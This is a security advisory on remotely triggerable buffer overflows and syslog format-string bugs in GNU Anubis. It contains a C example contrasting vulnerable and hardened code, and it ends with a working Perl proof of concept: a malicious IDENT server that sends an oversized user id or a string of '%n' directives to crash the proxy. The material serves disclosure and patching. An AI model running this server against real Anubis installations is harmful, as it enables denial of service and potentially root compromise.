[UNIX] GNU Anubis Buffer Overflows and Format String Bugs

From: SecuriTeam (support_at_securiteam.com)
Date: 03/08/04

    To: list@securiteam.com
    Date: 8 Mar 2004 18:39:41 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      GNU Anubis Buffer Overflows and Format String Bugs
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.gnu.org/software/anubis/> GNU Anubis is "an outgoing mail
    processor. It goes between the MUA (Mail User Agent) and the MTA (Mail
    Transport Agent), and can perform various sorts of processing and
    conversion on-the-fly in accordance with the sender's specified rules,
    based on a highly configurable regular expressions system. It operates as
    a proxy server, and can edit outgoing mail headers, encrypt or sign mail
    with the GnuPG, build secure SMTP tunnels using the TLS/SSL encryption
    even if your mail user agent doesn't support it, or tunnel a connection
    through a SOCKS proxy server".

    Ulf Harnhammar has found two buffer overflows and three format string bugs
    in GNU Anubis. All five can be triggered remotely and could potentially
    yield root access: GNU Anubis usually starts as root and only drops its
    privileges after some of the vulnerable functions have already run.

    DETAILS

    Vulnerable Systems:
     * GNU Anubis versions 3.6.0, 3.6.1, 3.6.2, 3.9.92, 3.9.93

    Immune Systems:
     * GNU Anubis version 3.6.2 with vendor patch, 3.9.93 with vendor patch,
    latest CVS

    a) There are two buffer overflows in the function auth_ident() in auth.c.
    They are caused by sscanf() format strings that use an unbounded "%s"
    conversion where a width-limited one such as "%63s" was needed: "%s"
    copies the field up to the next whitespace no matter how long it is, so
    an oversized field in the IDENT reply overruns the fixed-size destination
    buffer.

    b) There are format string bugs in three instances of the syslog() call.
    They are located in the function info() in log.c, the function
    anubis_error() in errs.c and the function ssl_error() in ssl.c. Each of
    these functions takes a string partially made up of user-supplied data
    and passes it to syslog() as the format string instead of as an argument
    ('syslog(priority, string);' instead of 'syslog(priority, "%s",
    string);'), so any conversion directives in the user-supplied part are
    interpreted by syslog(). These format string bugs become a bigger problem
    if termlevel is set to VERBOSE or DEBUG, as GNU Anubis then logs more
    data through the syslog() facility.
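    The two bug classes above, shown side by side in an added C example that
    is not Anubis's own code: the IDENT reply layout, the 64-byte buffer size
    (implied by the "%63s" the advisory mentions), the function names and
    the sample replies are all assumptions made for the illustration. The
    bounded parser uses a width limit and then rejects, rather than silently
    truncates, a user id that did not end at the limit; the logging helper
    passes the attacker-controlled field as an argument to a fixed "%s"
    format, so the Perl PoC's "%n" payload arrives in the log as literal
    text. The unbounded sscanf() shape is included only to show the pattern;
    it is never called with an oversized input here.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Assumed destination size; the advisory's "%63s" implies a 64-byte buffer. */
#define USER_MAX 64

/* Vulnerable shape (assumed, mirrors the advisory's description; do NOT call
 * with untrusted input): "%s" copies the user id until whitespace regardless
 * of length, so a 400 x 'U' reply runs far past the 64-byte destination. */
static int ident_parse_unbounded(const char *reply, char user[USER_MAX])
{
    return sscanf(reply, "%*[^:]:%*[^:]:%*[^:]: %s", user) == 1;
}

/* Hardened shape: width-limited conversion plus an explicit check that the
 * field really ended at the limit, so an oversized id is rejected outright. */
static int ident_parse_bounded(const char *reply, char *user, size_t user_len)
{
    char tmp[USER_MAX];
    int end = -1;

    if (user_len < sizeof tmp)
        return 0;
    /* "%63s" leaves room for the NUL; "%n" records how far sscanf() got. */
    if (sscanf(reply, "%*[^:]:%*[^:]:%*[^:]: %63s%n", tmp, &end) != 1 || end < 0)
        return 0;
    /* The width limit alone would silently truncate; treat a user id that
     * continues past the limit as malformed instead. */
    if (reply[end] != '\0' && !isspace((unsigned char)reply[end]))
        return 0;
    memcpy(user, tmp, strlen(tmp) + 1);
    return 1;
}

/* Vulnerable shape from the advisory, shown as a comment only because running
 * it on a "%n" payload is undefined behaviour:
 *
 *     static void info_unsafe(const char *msg) { syslog(LOG_INFO, msg); }
 *
 * Fixed shape: the user-controlled text is an argument, never the format. */
static void info_safe(const char *msg)
{
    syslog(LOG_INFO, "%s", msg);
}

/* The same fix applied to the in-memory formatting step, returned so it can
 * be checked: '%' characters in user come through literally. */
static int format_for_log(char *out, size_t out_len, const char *user)
{
    return snprintf(out, out_len, "ident user: %s", user);
}

/* Constructed sample replies (not captured from a real IDENT server). */
static const char benign_reply[] = "a: USERID: a:alice\r\n";
static const char fmt_reply[]    = "a: USERID: a:%n%n%n%n\r\n";

/* 1 when the bounded parser accepts the benign reply as "alice". */
int demo_benign_parses(void)
{
    char user[USER_MAX];
    return ident_parse_bounded(benign_reply, user, sizeof user) == 1
        && strcmp(user, "alice") == 0;
}

/* 1 when the unbounded parser also handles the benign reply; the bug only
 * shows with oversized input, which is why it went unnoticed in normal use. */
int demo_unbounded_benign(void)
{
    char user[USER_MAX];
    return ident_parse_unbounded(benign_reply, user) == 1
        && strcmp(user, "alice") == 0;
}

/* 1 when the bounded parser rejects the PoC's 400 x 'U' overflow reply. */
int demo_overflow_rejected(void)
{
    char reply[13 + 400 + 3];
    char user[USER_MAX];
    memcpy(reply, "a: USERID: a:", 13);
    memset(reply + 13, 'U', 400);
    memcpy(reply + 413, "\r\n", 3);
    return ident_parse_bounded(reply, user, sizeof user) == 0;
}

/* 1 when a "%n" user id survives formatting as literal text, i.e. the
 * attacker's directives are treated as data, not as a format string. */
int demo_format_string_is_data(void)
{
    char user[USER_MAX], line[128];
    if (ident_parse_bounded(fmt_reply, user, sizeof user) != 1)
        return 0;
    format_for_log(line, sizeof line, user);
    return strcmp(line, "ident user: %n%n%n%n") == 0;
}

int main(void)
{
    char user[USER_MAX], line[128];
    printf("benign reply parses: %d\n", demo_benign_parses());
    printf("overflow reply rejected: %d\n", demo_overflow_rejected());
    printf("%%n payload logged as data: %d\n", demo_format_string_is_data());
    if (ident_parse_bounded(fmt_reply, user, sizeof user)) {
        format_for_log(line, sizeof line, user);
        info_safe(line);   /* reaches syslog as literal text */
    }
    return 0;
}
```

    Compiling with -Wformat-security flags the commented-out info_unsafe()
    shape; that warning is the quickest audit for the three syslog() sites
    the advisory names.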

    Solution:
    The vendor has released official security patches for 3.6.2 and 3.9.93.
    They can be downloaded from the program's homepage. They correct both the
    buffer overflows and the format string bugs.

    Proof of concept:
    One of the methods of attacking GNU Anubis is through IDENT data, as it
    always connects to the client's IDENT server to get more information about
    the client. I wrote a simple malicious IDENT server in Perl. It crashes
    the current instance of GNU Anubis, either by using the buffer overflows
    or by using the format string bugs.

    Here it is:
    #!/usr/bin/perl --
    # anubis-crasher
    # Ulf Harnhammar 2004
    # I hereby place this program in the Public Domain.
    #
    # Listens on the IDENT port and answers every query with a malicious
    # USERID reply. GNU Anubis connects back to the client's IDENT server,
    # so a client talking to a vulnerable Anubis from the host running this
    # script delivers the payload into auth_ident().

    use strict;
    use warnings;
    use IO::Socket;

    sub usage()
    {
      die "usage: $0 type\n".
          "type is 'a' (buffer overflow) or 'b' (format string bug).\n";
    } # sub usage

    my $port = 113;   # IDENT (RFC 1413); binding it requires root

    usage() unless @ARGV == 1;
    my $type = shift;
    usage() unless $type =~ m|^[ab]$|;

    # 'a': an oversized user id to overrun the sscanf() "%s" destination.
    # 'b': a run of "%n" directives for the syslog() format string bugs.
    my %send;
    $send{'a'} = 'U' x 400;
    $send{'b'} = '%n' x 28;
    my $sendstr = $send{$type};

    my $server = IO::Socket::INET->new(Proto => 'tcp',
                                       LocalPort => $port,
                                       Listen => SOMAXCONN,
                                       Reuse => 1) or
                 die "can't create server: $!";

    while (my $client = $server->accept())
    {
      $client->autoflush(1);
      print "got a connection\n";

      # the query is "<server-port>, <client-port>"; its contents are ignored
      my $input = <$client>;
      $input = '' unless defined $input;
      $input =~ tr/\015\012//d;
      print "client said $input\n";

    # my $wait = <STDIN>;   # uncomment to pause before replying

      my $output = "a: USERID: a:$sendstr";
      print $client "$output\n";
      print "I said $output\n";

      close $client;
      print "disconnected\n";
    } # while client=server->accept

    __END__

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:Ulf.Harnhammar.9485@student.uu.se> Ulf Harnhammar.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.


